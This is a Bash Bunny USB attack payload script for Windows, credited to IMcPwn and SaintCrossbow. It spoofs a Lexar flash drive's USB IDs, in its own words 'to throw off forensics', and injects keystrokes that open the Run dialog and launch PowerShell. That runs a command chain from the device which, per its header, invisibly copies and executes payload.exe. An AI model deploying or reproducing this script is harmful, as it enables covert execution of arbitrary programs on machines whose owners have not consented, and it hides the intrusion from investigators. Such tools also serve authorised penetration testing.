#!/bin/bash
#
# Title:         ExecutableInstaller
# Author:        IMcPwn (original)
# Additions:     SaintCrossbow (only for the parts to run SFE)
# Version:       1.0
# Target:        Windows 7+
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
# using the --startup parameter. Change these settings inside of e.cmd.
#

# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh

LED R
# Note: Acting as Lexar Compact Flash Drive to throw off forensics
ATTACKMODE HID STORAGE VID_0X05DC PID_0X0081
QUACK DELAY 200
REM --> Minimize all windows
QUACK WINDOWS d
QUACK DELAY 200
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch2\d.cmd')"
QUACK ENTER
LED G
